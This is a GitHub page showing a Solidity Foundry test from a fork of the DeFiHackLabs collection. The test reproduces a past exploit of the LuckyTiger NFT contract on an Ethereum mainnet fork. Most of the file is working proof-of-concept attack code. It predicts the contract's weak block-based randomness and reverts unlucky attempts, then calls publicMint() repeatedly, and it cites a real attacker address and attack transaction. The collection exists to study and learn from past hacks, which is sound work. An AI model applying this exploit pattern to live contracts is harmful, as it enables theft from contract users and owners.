forked from SunWeb3Sec/DeFiHackLabs
-
Notifications
You must be signed in to change notification settings - Fork 0
/
LuckyTiger_exp.sol
74 lines (53 loc) · 1.94 KB
/
LuckyTiger_exp.sol
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
// SPDX-License-Identifier: GPL-3.0
pragma solidity ^0.8.13;
import "forge-std/Test.sol";
/*
Attacker: 0x3392c91403f09ad3b7e7243dbd4441436c7f443c
Attack tx: https://etherscan.io/tx/0x804ff3801542bff435a5d733f4d8a93a535d73d0de0f843fd979756a7eab26af
poc refers to: https://github.com/0xNezha/luckyHack
*/
interface NFT {
function balanceOf(address _owner) external view returns (uint balance);
}
contract luckyHack is Test {
event Log(string);
address owner = address(this);
address nftAddress = 0x9c87A5726e98F2f404cdd8ac8968E9b2C80C0967;
function setUp() public {
vm.createSelectFork("mainnet", 15403430); // fork mainnet block number 15403430
vm.deal(address(this), 3 ether);
vm.deal(address(nftAddress), 5 ether);
}
function getRandom() public view returns(uint){
if(uint256(keccak256(abi.encodePacked(block.difficulty,block.timestamp))) % 2 == 0) {
return 0;
}else{
return 1;
}
}
function onERC721Received(address, address, uint256, bytes memory) public pure returns (bytes4) {
return this.onERC721Received.selector;
}
function testExploit() public {
vm.warp(1661351167);
console.log("getRandom",getRandom());
uint amount = 10;
if(uint256(keccak256(abi.encodePacked(block.difficulty,block.timestamp))) % 2 == 0) {
revert("Not lucky");
}
bytes memory data = abi.encodeWithSignature("publicMint()");
for(uint i=0; i<amount ; ++i){
(bool status,) = address(nftAddress).call{value:0.01 ether}(data);
if( !status ){
revert("error");
}else{
emit Log("success");
}
}
console.log("NFT we got:",NFT(nftAddress).balanceOf(address(this)));
}
function getBalance() external view returns(uint256) {
return address(this).balance;
}
receive() external payable {}
}